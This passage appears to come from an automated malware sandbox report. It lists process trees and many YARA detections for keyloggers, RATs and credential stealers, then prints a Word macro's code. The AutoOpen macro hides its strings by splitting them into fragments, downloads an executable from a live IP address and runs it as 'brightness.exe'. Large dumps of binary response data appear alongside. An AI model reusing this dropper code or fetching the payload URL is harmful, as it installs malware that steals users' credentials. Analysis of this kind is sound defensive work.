                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\Aiymwhpj.PIF
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\Public\Libraries\Aiymwhpj.PIF"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'161'216 bytes
                                                                                                                                          MD5 hash:6047499517804F1EA76B508CA469DE99
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000001.2327344722.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000002.3731782871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000001.2327344722.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3761096680.0000000023881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3761096680.0000000023881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000002.3731782871.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:false

                                                                                                                                          Disassembly

                                                                                                                                          Code Analysis

                                                                                                                                          Call Graph

                                                                                                                                          • Entrypoint
                                                                                                                                          • Decryption Function
                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          • Show Help
                                                                                                                                          callgraph 9 AutoOpen Shell:1,CreateObject:2,Open:1,Send:1

                                                                                                                                          Module: ThisDocument

                                                                                                                                          Declaration
                                                                                                                                          LineContent
                                                                                                                                          1

                                                                                                                                          Attribute VB_Name = "ThisDocument"

                                                                                                                                          2

                                                                                                                                          Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                                          3

                                                                                                                                          Attribute VB_GlobalNameSpace = False

                                                                                                                                          4

                                                                                                                                          Attribute VB_Creatable = False

                                                                                                                                          5

                                                                                                                                          Attribute VB_PredeclaredId = True

                                                                                                                                          6

                                                                                                                                          Attribute VB_Exposed = True

                                                                                                                                          7

                                                                                                                                          Attribute VB_TemplateDerived = True

                                                                                                                                          8

                                                                                                                                          Attribute VB_Customizable = True

                                                                                                                                          Executed Functions

                                                                                                                                          Subroutine

                                                                                                                                          AutoOpenAPIs: 6, Strings: 20, Number of lines: 59, Relevance: 70.059

                                                                                                                                          APIsMeta Information

                                                                                                                                          CreateObject

                                                                                                                                          		CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                          CreateObject

                                                                                                                                          		CreateObject("Adodb.Stream")

                                                                                                                                          Open

                                                                                                                                          		IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)

                                                                                                                                          Send

                                                                                                                                          responsebody

                                                                                                                                          		IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?

                                                                                                                                          Shell

                                                                                                                                          		Shell(""brightness.exe"") -> 5560
                                                                                                                                          StringsDecrypted Strings
                                                                                                                                          "M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
                                                                                                                                          "Ad""od""b.S""tr""ea""m"
                                                                                                                                          "h"
                                                                                                                                          "t"
                                                                                                                                          "t""p:/""/147.124.216.113/image"
                                                                                                                                          "."
                                                                                                                                          "e"
                                                                                                                                          "x"
                                                                                                                                          "e"
                                                                                                                                          "GET"
                                                                                                                                          "brightness"
                                                                                                                                          "."
                                                                                                                                          "e"
                                                                                                                                          "x"
                                                                                                                                          "e"
                                                                                                                                          """brightness"
                                                                                                                                          "."
                                                                                                                                          "e"
                                                                                                                                          "x"
                                                                                                                                          "e"""
                                                                                                                                          LineInstructionMeta Information
                                                                                                                                          9

                                                                                                                                          Sub AutoOpen()

                                                                                                                                          11

                                                                                                                                          Dim xHttp

                                                                                                                                          executed
                                                                                                                                          16

                                                                                                                                          Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")

                                                                                                                                          CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                          executed
                                                                                                                                          18

                                                                                                                                          Dim bStrm

                                                                                                                                          20

                                                                                                                                          Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")

                                                                                                                                          CreateObject("Adodb.Stream")

                                                                                                                                          executed
                                                                                                                                          24

                                                                                                                                          Dim nirm1

                                                                                                                                          25

                                                                                                                                          nirm1 = "h"

                                                                                                                                          26

                                                                                                                                          Dim nirm2

                                                                                                                                          27

                                                                                                                                          nirm2 = "t"

                                                                                                                                          28

                                                                                                                                          Dim nirm3

                                                                                                                                          29

                                                                                                                                          nirm3 = "t" & "p:/" & "/147.124.216.113/image"

                                                                                                                                          30

                                                                                                                                          Dim nirm4

                                                                                                                                          31

                                                                                                                                          nirm4 = "."

                                                                                                                                          32

                                                                                                                                          Dim nirm5

                                                                                                                                          33

                                                                                                                                          nirm5 = "e"

                                                                                                                                          34

                                                                                                                                          Dim nirm6

                                                                                                                                          35

                                                                                                                                          nirm6 = "x"

                                                                                                                                          36

                                                                                                                                          Dim nirm7

                                                                                                                                          37

                                                                                                                                          nirm7 = "e"

                                                                                                                                          41

                                                                                                                                          Dim plpl

                                                                                                                                          42

                                                                                                                                          plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

                                                                                                                                          45

                                                                                                                                          xHttp.Open "GET", plpl, False

                                                                                                                                          IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)

                                                                                                                                          executed
                                                                                                                                          46

                                                                                                                                          xHttp.Send

                                                                                                                                          Send

                                                                                                                                          52

                                                                                                                                          With bStrm

                                                                                                                                          53

                                                                                                                                          . Type = 1

                                                                                                                                          54

                                                                                                                                          . Open

                                                                                                                                          55

                                                                                                                                          . write xHttp.responsebody

                                                                                                                                          IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?

                                                                                                                                          executed
                                                                                                                                          59

                                                                                                                                          Dim monu1

                                                                                                                                          60

                                                                                                                                          monu1 = "brightness"

                                                                                                                                          61

                                                                                                                                          Dim monu2

                                                                                                                                          62

                                                                                                                                          monu2 = "."

                                                                                                                                          64

                                                                                                                                          Dim monu3

                                                                                                                                          65

                                                                                                                                          monu3 = "e"

                                                                                                                                          67

                                                                                                                                          Dim monu4

                                                                                                                                          68

                                                                                                                                          monu4 = "x"

